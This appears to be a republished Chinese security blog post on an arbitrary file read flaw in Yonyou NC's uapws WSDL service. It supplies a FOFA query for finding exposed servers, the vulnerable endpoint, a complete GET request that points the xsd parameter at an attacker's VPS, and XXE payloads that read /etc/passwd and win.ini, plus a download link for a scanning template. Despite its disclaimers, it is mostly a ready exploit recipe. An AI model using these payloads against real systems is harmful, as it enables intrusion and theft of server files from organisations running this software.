用友 NC uapws wsdl 任意文件读取

2023年12月14日23:58:55评论90 views字数 998阅读3分19秒阅读模式

请勿利用文章内的相关技术从事非法测试，由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，作者不为此承担任何责任。工具来自网络，安全性自测，如有侵权请联系删除。本次测试仅供学习交流使用，如若非法他用，与平台和本文作者无关，需自行负责！

漏洞概述

用友 NC uapws wsdl 存在任意文件读取漏洞。

空间搜索语法

fofa

app="用友-UFIDA-NC"

利用过程

登录界面

用友 NC uapws wsdl 任意文件读取

漏洞存在位置

http://x.x.x.x/uapws/service/nc.uap.oba.update.IUpdateService?wsdl

用友 NC uapws wsdl 任意文件读取

修改xsd参数值可触发该漏洞，请求远程VPS服务器。

GET /uapws/service/nc.uap.oba.update.IUpdateService?xsd=http://x.x.x.x/test.xml HTTP/1.1Host: Pragma: no-cacheCache-Control: no-cacheAccept: text/plain, */*; q=0.01User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)

存在漏洞响应如下

用友 NC uapws wsdl 任意文件读取

任意文件读取利用，需要VPS上建立对应操作系统的xml文件，然后开启http服务。xml文件如下

windows:<?xml version="1.0"?><!DOCTYPE test [<!ENTITY name SYSTEM "file:///c://windows/win.ini">]><user><username>&name;</username><password>1</password></user>
linux:evil.xml:<?xml version="1.0"?><!DOCTYPE test [<!ENTITY name SYSTEM "file:///etc/passwd">]><user><username>&name;</username><password>1</password></user>

触发文件读取漏洞响应如下

用友 NC uapws wsdl 任意文件读取

nuclei

NCuapws1下载地址：
链接：https://pan.baidu.com/s/1oUd3H7yOdYCXLUCfuzA0DA
提取码：bgl0

原文始发于微信公众号（天澜实验室）：用友 NC uapws wsdl 任意文件读取

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。

左青龙
微信扫一扫

右白虎
微信扫一扫

用友 NC uapws wsdl 任意文件读取

Argo Events权限管理不当漏洞

Oracle E-Business Suite远程代码执行漏洞(CVE-2025-30727)

Apache Roller 漏洞让攻击者获得未经授权的访问

Oracle E-Business Suite远程代码执行漏洞（CVE-2025-30727）

Apache Roller 未经授权的访问漏洞

Gladinet漏洞CVE-2025-30406遭在野利用

安美酒店管理系统/get_user_enrollment.php接口 sql注入漏洞

Microsoft Edge信息泄露漏洞(CVE-2025-29834)

【已复现】Gladinet CentreStack & Triofox 远程RCE漏洞（CVE-2025-30406）

【成功复现】Palo Alto Networks PAN-OS 身份验证绕过漏洞(CVE-2025-0108)

发表评论

在线咨询

微信